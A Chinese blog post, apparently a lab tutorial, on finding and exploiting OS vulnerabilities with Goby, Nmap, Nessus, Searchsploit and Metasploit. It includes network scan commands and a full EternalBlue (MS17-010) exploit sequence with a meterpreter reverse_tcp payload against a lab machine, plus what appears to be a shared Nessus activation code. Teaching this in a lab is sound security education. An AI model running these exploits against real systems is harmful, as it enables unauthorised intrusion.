漏洞发现-操作系统之漏洞探针类型利用修复
漏洞扫描工具演示-Goby,Nmap,Nessus
Goby 忍者系统测试
进行扫描获得结果
查看靶机漏洞
可以根据漏洞编号去查看信息,并且可以寻找exp去进行攻击
Nmap扫描
如果加上参数,就会调用script目录下的nse插件进行扫描
输入命令进行扫描
nmap --script=vulscan/vulscan.nse 192.168.50.0/24
Nessus安装-使用-插件库加载扫描
- https://www.tenable.com/downloads/nessus?loginAttempted=true
- https://www.cnblogs.com/jackzz/p/10899039.html
- Nessus-10.1.1-x64.msi
- DA5A-0EFC-AFA3-7CC9-7AF2
对主机以及网段进行扫描
扫描的结果
漏洞利用框架演示-Searchsploit
单点exp的获得
Searchsploit使用
第一次用会提示需要更新漏洞信息
github拉取文件后再次尝试
searchsploit -u
搜索漏洞
漏洞利用框架演示-Metasploit
尝试先搜索漏洞信息,根据搜索结果选择这个进行漏洞扫描,最后是用kali做的效果
设置参数
#扫描ms17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.50.0/24
set THREADS 50
exploit
根据搜索结果,发现2个可以利用的目标
对win7靶机尝试利用漏洞攻击
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.50.94
exploit
成功获取到shell
关于Meterpreter命令,可以用help查看
最后一次更新于2022-03-14 16:32
0 条评论